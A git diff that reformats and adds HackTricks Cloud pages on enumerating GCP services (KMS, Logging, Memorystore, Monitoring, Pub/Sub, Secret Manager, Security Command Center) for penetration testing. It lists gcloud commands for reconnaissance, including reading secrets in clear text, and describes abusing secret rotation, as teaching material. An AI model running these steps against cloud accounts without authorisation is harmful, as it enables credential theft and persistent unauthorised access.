-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## KMS
 
@@ -23,20 +10,20 @@ KMS key rings are by **default created as global**, which means that the keys in
 
 ### Key Protection Level
 
-* **Software keys**: Software keys are **created and managed by KMS entirely in software**. These keys are **not protected by any hardware security module (HSM)** and can be used for t**esting and development purposes**. Software keys are **not recommended for production** use because they provide low security and are susceptible to attacks.
-* **Cloud-hosted keys**: Cloud-hosted keys are **created and managed by KMS** in the cloud using a highly available and reliable infrastructure. These keys are **protected by HSMs**, but the HSMs are **not dedicated to a specific customer**. Cloud-hosted keys are suitable for most production use cases.
-* **External keys**: External keys are **created and managed outside of KMS**, and are imported into KMS for use in cryptographic operations. External keys **can be stored in a hardware security module (HSM) or a software library, depending on the customer's preference**.
+- **Software keys**: Software keys are **created and managed by KMS entirely in software**. These keys are **not protected by any hardware security module (HSM)** and can be used for t**esting and development purposes**. Software keys are **not recommended for production** use because they provide low security and are susceptible to attacks.
+- **Cloud-hosted keys**: Cloud-hosted keys are **created and managed by KMS** in the cloud using a highly available and reliable infrastructure. These keys are **protected by HSMs**, but the HSMs are **not dedicated to a specific customer**. Cloud-hosted keys are suitable for most production use cases.
+- **External keys**: External keys are **created and managed outside of KMS**, and are imported into KMS for use in cryptographic operations. External keys **can be stored in a hardware security module (HSM) or a software library, depending on the customer's preference**.
 
 ### Key Purposes
 
-* **Symmetric encryption/decryption**: Used to **encrypt and decrypt data using a single key for both operations**. Symmetric keys are fast and efficient for encrypting and decrypting large volumes of data.
-  * **Supported**: [cryptoKeys.encrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/encrypt), [cryptoKeys.decrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt)
-* **Asymmetric Signing**: Used for secure communication between two parties without sharing the key. Asymmetric keys come in a pair, consisting of a **public key and a private key**. The public key is shared with others, while the private key is kept secret.
-  * **Supported:** [cryptoKeyVersions.asymmetricSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricSign), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey)
-* **Asymmetric Decryption**: Used to verify the authenticity of a message or data. A digital signature is created using a private key and can be verified using the corresponding public key.
-  * **Supported:** [cryptoKeyVersions.asymmetricDecrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricDecrypt), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey)
-* **MAC Signing**: Used to ensure **data integrity and authenticity by creating a message authentication code (MAC) using a secret key**. HMAC is commonly used for message authentication in network protocols and software applications.
-  * **Supported:** [cryptoKeyVersions.macSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macSign), [cryptoKeyVersions.macVerify](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macVerify)
+- **Symmetric encryption/decryption**: Used to **encrypt and decrypt data using a single key for both operations**. Symmetric keys are fast and efficient for encrypting and decrypting large volumes of data.
+  - **Supported**: [cryptoKeys.encrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/encrypt), [cryptoKeys.decrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys/decrypt)
+- **Asymmetric Signing**: Used for secure communication between two parties without sharing the key. Asymmetric keys come in a pair, consisting of a **public key and a private key**. The public key is shared with others, while the private key is kept secret.
+  - **Supported:** [cryptoKeyVersions.asymmetricSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricSign), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey)
+- **Asymmetric Decryption**: Used to verify the authenticity of a message or data. A digital signature is created using a private key and can be verified using the corresponding public key.
+  - **Supported:** [cryptoKeyVersions.asymmetricDecrypt](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/asymmetricDecrypt), [cryptoKeyVersions.getPublicKey](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/getPublicKey)
+- **MAC Signing**: Used to ensure **data integrity and authenticity by creating a message authentication code (MAC) using a secret key**. HMAC is commonly used for message authentication in network protocols and software applications.
+  - **Supported:** [cryptoKeyVersions.macSign](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macSign), [cryptoKeyVersions.macVerify](https://cloud.google.com/kms/docs/reference/rest/v1/projects.locations.keyRings.cryptoKeys.cryptoKeyVersions/macVerify)
 
 ### Rotation Period & Programmed for destruction period
 
@@ -78,31 +65,18 @@ gcloud kms decrypt --ciphertext-file=[INFILE] \
 
 ### Privilege Escalation
 
-{% content-ref url="../gcp-privilege-escalation/gcp-kms-privesc.md" %}
-[gcp-kms-privesc.md](../gcp-privilege-escalation/gcp-kms-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-privilege-escalation/gcp-kms-privesc.md
+{{#endref}}
 
 ### Post Exploitation
 
-{% content-ref url="../gcp-post-exploitation/gcp-kms-post-exploitation.md" %}
-[gcp-kms-post-exploitation.md](../gcp-post-exploitation/gcp-kms-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-post-exploitation/gcp-kms-post-exploitation.md
+{{#endref}}
 
 ## References
 
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md
similarity index 58%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md
index 102c59199..efb699e73 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md
@@ -1,19 +1,6 @@
 # GCP - Logging Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -23,15 +10,15 @@ Cloud Logging is fully integrated with other GCP services, providing a centraliz
 
 Key Features:
 
-* **Log Data Centralization:** Aggregate log data from various sources, offering a holistic view of your applications and infrastructure.
-* **Real-time Log Management:** Stream logs in real time for immediate analysis and response.
-* **Powerful Data Analysis:** Use advanced filtering and search capabilities to sift through large volumes of log data quickly.
-* **Integration with BigQuery:** Export logs to BigQuery for detailed analysis and querying.
-* **Log-based Metrics:** Create custom metrics from your log data for monitoring and alerting.
+- **Log Data Centralization:** Aggregate log data from various sources, offering a holistic view of your applications and infrastructure.
+- **Real-time Log Management:** Stream logs in real time for immediate analysis and response.
+- **Powerful Data Analysis:** Use advanced filtering and search capabilities to sift through large volumes of log data quickly.
+- **Integration with BigQuery:** Export logs to BigQuery for detailed analysis and querying.
+- **Log-based Metrics:** Create custom metrics from your log data for monitoring and alerting.
 
 ### Logs flow
 
-
https://betterstack.com/community/guides/logging/gcp-logging/

+
https://betterstack.com/community/guides/logging/gcp-logging/

 
 Basically the sinks and log based metrics will device where a log should be stored.
 
@@ -40,48 +27,42 @@ Basically the sinks and log based metrics will device where a log should be stor
 Cloud Logging is highly configurable to suit diverse operational needs:
 
 1. **Log Buckets (Logs storage in the web):** Define buckets in Cloud Logging to manage **log retention**, providing control over how long your log entries are retained.
-   * By default the buckets `_Default` and `_Required` are created (one is logging what the other isn’t).
-     * **\_Required** is:
+   - By default the buckets `_Default` and `_Required` are created (one is logging what the other isn’t).
+     - **\_Required** is:
 
-{% code overflow="wrap" %}
 ````
      ```bash
      LOG_ID("cloudaudit.googleapis.com/activity") OR LOG_ID("externalaudit.googleapis.com/activity") OR LOG_ID("cloudaudit.googleapis.com/system_event") OR LOG_ID("externalaudit.googleapis.com/system_event") OR LOG_ID("cloudaudit.googleapis.com/access_transparency") OR LOG_ID("externalaudit.googleapis.com/access_transparency")
      ```
-     
-````
-{% endcode %}
 
-* **Retention period** of the data is configured per bucket and must be **at least 1 day.** However the **retention period of \_Required is 400 days** and cannot be modified.
-* Note that Log Buckets are **not visible in Cloud Storage.**
+````
+
+- **Retention period** of the data is configured per bucket and must be **at least 1 day.** However the **retention period of \_Required is 400 days** and cannot be modified.
+- Note that Log Buckets are **not visible in Cloud Storage.**
 
 2. **Log Sinks (Log router in the web):** Create sinks to **export log entries** to various destinations such as Pub/Sub, BigQuery, or Cloud Storage based on a **filter**.
-   * By **default** sinks for the buckets `_Default` and `_Required` are created:
-   * ```bash
+   - By **default** sinks for the buckets `_Default` and `_Required` are created:
+   - ```bash
      _Required  logging.googleapis.com/projects//locations/global/buckets/_Required  LOG_ID("cloudaudit.googleapis.com/activity") OR LOG_ID("externalaudit.googleapis.com/activity") OR LOG_ID("cloudaudit.googleapis.com/system_event") OR LOG_ID("externalaudit.googleapis.com/system_event") OR LOG_ID("cloudaudit.googleapis.com/access_transparency") OR LOG_ID("externalaudit.googleapis.com/access_transparency")
      _Default   logging.googleapis.com/projects//locations/global/buckets/_Default   NOT LOG_ID("cloudaudit.googleapis.com/activity") AND NOT LOG_ID("externalaudit.googleapis.com/activity") AND NOT LOG_ID("cloudaudit.googleapis.com/system_event") AND NOT LOG_ID("externalaudit.googleapis.com/system_event") AND NOT LOG_ID("cloudaudit.googleapis.com/access_transparency") AND NOT LOG_ID("externalaudit.googleapis.com/access_transparency")
      ```
-   * **Exclusion Filters:** It's possible to set up **exclusions to prevent specific log entries** from being ingested, saving costs, and reducing unnecessary noise.
+   - **Exclusion Filters:** It's possible to set up **exclusions to prevent specific log entries** from being ingested, saving costs, and reducing unnecessary noise.
 3. **Log-based Metrics:** Configure **custom metrics** based on the content of logs, allowing for alerting and monitoring based on log data.
 4. **Log views:** Log views give advanced and **granular control over who has access** to the logs within your log buckets.
-   * Cloud Logging **automatically creates the `_AllLogs` view for every bucket**, which shows all logs. Cloud Logging also creates a view for the `_Default` bucket called `_Default`. The `_Default` view for the `_Default` bucket shows all logs except Data Access audit logs. The `_AllLogs` and `_Default` views are not editable.
+   - Cloud Logging **automatically creates the `_AllLogs` view for every bucket**, which shows all logs. Cloud Logging also creates a view for the `_Default` bucket called `_Default`. The `_Default` view for the `_Default` bucket shows all logs except Data Access audit logs. The `_AllLogs` and `_Default` views are not editable.
 
 It's possible to allow a principal **only to use a specific Log view** with an IAM policy like:
 
-{% code overflow="wrap" %}
 ```json
 {
   "bindings": [
     {
-      "members": [
-        "user:username@gmail.com"
-      ],
+      "members": ["user:username@gmail.com"],
       "role": "roles/logging.viewAccessor",
       "condition": {
-          "title": "Bucket reader condition example",
-          "description": "Grants logging.viewAccessor role to user username@gmail.com for the VIEW_ID log view.",
-          "expression":
-            "resource.name == \"projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_NAME/views/VIEW_ID\""
+        "title": "Bucket reader condition example",
+        "description": "Grants logging.viewAccessor role to user username@gmail.com for the VIEW_ID log view.",
+        "expression": "resource.name == \"projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_NAME/views/VIEW_ID\""
       }
     }
   ],
@@ -89,7 +70,6 @@ It's possible to allow a principal **only to use a specific Log view** with an I
   "version": 3
 }
 ```
-{% endcode %}
 
 ### Default Logs
 
@@ -103,11 +83,11 @@ However, note that this means that by default **`GetIamPolicy`** actions and oth
 
 To enable more logs in the console the sysadmin needs to go to [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) and enable them. There are 2 different options:
 
-* **Default Configuration**: It's possible to create a default configuration and log all the Admin Read and/or Data Read and/or Data Write logs and even add exempted principals:
+- **Default Configuration**: It's possible to create a default configuration and log all the Admin Read and/or Data Read and/or Data Write logs and even add exempted principals:
 
-

+

 
-* **Select the services**: Or just **select the services** you would like to generate logs and the type of logs and the excepted principal for that specific service.
+- **Select the services**: Or just **select the services** you would like to generate logs and the type of logs and the excepted principal for that specific service.
 
 Also note that by default only those logs are being generated because generating more logs will increase the costs.
 
@@ -115,7 +95,6 @@ Also note that by default only those logs are being generated because generating
 
 The `gcloud` command-line tool is an integral part of the GCP ecosystem, allowing you to manage your resources and services. Here's how you can use `gcloud` to manage your logging configurations and access logs.
 
-{% code overflow="wrap" %}
 ```bash
 # List buckets
 gcloud logging buckets list
@@ -140,42 +119,28 @@ gcloud logging views describe --bucket  --location global  # vi
 gcloud logging links list --bucket _Default --location global
 gcloud logging links describe  --bucket _Default --location global
 ```
-{% endcode %}
 
-Example to check the logs of **`cloudresourcemanager`** (the one used to BF permissions): [https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512](https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512)
+Example to check the logs of **`cloudresourcemanager`** (the one used to BF permissions): [https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512](https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2&project=digital-bonfire-410512)
 
 There aren't logs of **`testIamPermissions`**:
 
-

+

 
 ### Post Exploitation
 
-{% content-ref url="../gcp-post-exploitation/gcp-logging-post-exploitation.md" %}
-[gcp-logging-post-exploitation.md](../gcp-post-exploitation/gcp-logging-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-post-exploitation/gcp-logging-post-exploitation.md
+{{#endref}}
 
 ### Persistence
 
-{% content-ref url="../gcp-persistence/gcp-logging-persistence.md" %}
-[gcp-logging-persistence.md](../gcp-persistence/gcp-logging-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-persistence/gcp-logging-persistence.md
+{{#endref}}
 
 ## References
 
-* [https://cloud.google.com/logging/docs/logs-views#gcloud](https://cloud.google.com/logging/docs/logs-views#gcloud)
-* [https://betterstack.com/community/guides/logging/gcp-logging/](https://betterstack.com/community/guides/logging/gcp-logging/)
+- [https://cloud.google.com/logging/docs/logs-views#gcloud](https://cloud.google.com/logging/docs/logs-views#gcloud)
+- [https://betterstack.com/community/guides/logging/gcp-logging/](https://betterstack.com/community/guides/logging/gcp-logging/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
new file mode 100644
index 000000000..7af0a0350
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
@@ -0,0 +1,21 @@
+# GCP - Memorystore Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Memorystore
+
+Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
+
+```bash
+# Memcache
+gcloud memcache instances list --region 
+gcloud memcache instances describe  --region 
+# You should try to connect to the memcache instances to access the data
+
+# Redis
+gcloud redis instances list --region 
+gcloud redis instances describe  --region 
+gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
new file mode 100644
index 000000000..88b10a074
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
@@ -0,0 +1,57 @@
+# GCP - Monitoring Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Monitoring offers a suite of tools to **monitor**, troubleshoot, and improve the performance of your cloud resources. From a security perspective, Cloud Monitoring provides several features that are crucial for maintaining the security and compliance of your cloud environment:
+
+### Policies
+
+Policies **define conditions under which alerts are triggered and how notifications are sent**. They allow you to monitor specific metrics or logs, set thresholds, and determine where and how to send alerts (like email or SMS).
+
+### Dashboards
+
+Monitoring Dashboards in GCP are customizable interfaces for visualizing the **performance and status of cloud resources**. They offer real-time insights through charts and graphs, aiding in efficient system management and issue resolution.
+
+### Channels
+
+Different **channels** can be configured to **send alerts** through various methods, including **email**, **SMS**, **Slack**, and more.
+
+Moreover, when an alerting policy is created in Cloud Monitoring, it's possible to **specify one or more notification channels**.
+
+### Snoozers
+
+A snoozer will **prevent the indicated alert policies to generate alerts or send notifications** during the indicated snoozing period. Additionally, when a snooze is applied to a **metric-based alerting policy**, Monitoring proceeds to **resolve any open incidents** that are linked to that specific policy.
+
+### Enumeration
+
+```bash
+# Get policies
+gcloud alpha monitoring policies list
+gcloud alpha monitoring policies describe 
+
+# Get dashboards
+gcloud monitoring dashboards list
+gcloud monitoring dashboards describe 
+
+# Get snoozers
+gcloud monitoring snoozes list
+gcloud monitoring snoozes describe 
+
+# Get Channels
+gcloud alpha monitoring channels list
+gcloud alpha monitoring channels describe 
+```
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-monitoring-post-exploitation.md
+{{#endref}}
+
+## References
+
+- [https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli](https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md
similarity index 58%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md
index ffa213ee1..6cd241087 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md
@@ -1,19 +1,6 @@
 # GCP - Pub/Sub Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Pub/Sub 
 
@@ -21,10 +8,10 @@ Learn & practice GCP Hacking: 
 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md
new file mode 100644
index 000000000..a0d1764dc
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md
@@ -0,0 +1,53 @@
+# GCP - Secrets Manager Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Secret Manager
+
+Google [**Secret Manager**](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data.
+
+A secret can have **different versions storing different data**.
+
+Secrets by **default** are **encrypted using a Google managed key**, but it's **possible to select a key from KMS** to use to encrypt the secret.
+
+Regarding **rotation**, it's possible to configure **messages to be sent to pub-sub every number of days**, the code listening to those messages can **rotate the secret**.
+
+It's possible to configure a day for **automatic deletion**, when the indicated day is **reached**, the **secret will be automatically deleted**.
+
+### Enumeration
+
+```bash
+# First, list the entries
+gcloud secrets list
+gcloud secrets get-iam-policy 
+
+# Then, pull the clear-text of any version of any secret
+gcloud secrets versions list 
+gcloud secrets versions access 1 --secret=""
+```
+
+### Privilege Escalation
+
+In the following page you can check how to **abuse secretmanager permissions to escalate privileges.**
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-secretmanager-privesc.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-secret-manager-persistence.md
+{{#endref}}
+
+### Rotation misuse
+
+An attacker could update the secret to **stop rotations** (so it won't be modified), or **make rotations much less often** (so the secret won't be modified) or to **publish the rotation message to a different pub/sub**, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md
similarity index 53%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md
index dac57f94c..e38244da5 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md
@@ -1,19 +1,6 @@
 # GCP - Security Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -23,14 +10,14 @@ Google Cloud Platform (GCP) Security encompasses a **comprehensive suite of tool
 
 The Google Cloud Platform (GCP) Security Command Center (SCC) is a **security and risk management tool for GCP** resources that enables organizations to gain visibility into and control over their cloud assets. It helps **detect and respond to threats** by offering comprehensive security analytics, **identifying misconfigurations**, ensuring **compliance** with security standards, and **integrating** with other security tools for automated threat detection and response.
 
-* **Overview**: Panel to **visualize an overview** of all the result of the Security Command Center.
-* Threats: \[Premium Required] Panel to visualize all the **detected threats. Check more about Threats below**
-* **Vulnerabilities**: Panel to **visualize found misconfigurations in the GCP account**.
-* **Compliance**: \[Premium required] This section allows to **test your GCP environment against several compliance checks** (such as PCI-DSS, NIST 800-53, CIS benchmarks...) over the organization.
-* **Assets**: This section **shows all the assets being used**, very useful for sysadmins (and maybe attacker) to see what is running in a single page.
-* **Findings**: This **aggregates** in a **table findings** of different sections of GCP Security (not only Command Center) to be able to visualize easily findings that matters.
-* **Sources**: Shows a **summary of findings** of all the different sections of GCP security **by sectio**n.
-* **Posture**: \[Premium Required] Security Posture allows to **define, assess, and monitor the security of the GCP environment**. It works by creating policy that defines constraints or restrictions that controls/monitor the resources in GCP. There are several pre-defined posture templates that can be found in [https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy](https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy)
+- **Overview**: Panel to **visualize an overview** of all the result of the Security Command Center.
+- Threats: \[Premium Required] Panel to visualize all the **detected threats. Check more about Threats below**
+- **Vulnerabilities**: Panel to **visualize found misconfigurations in the GCP account**.
+- **Compliance**: \[Premium required] This section allows to **test your GCP environment against several compliance checks** (such as PCI-DSS, NIST 800-53, CIS benchmarks...) over the organization.
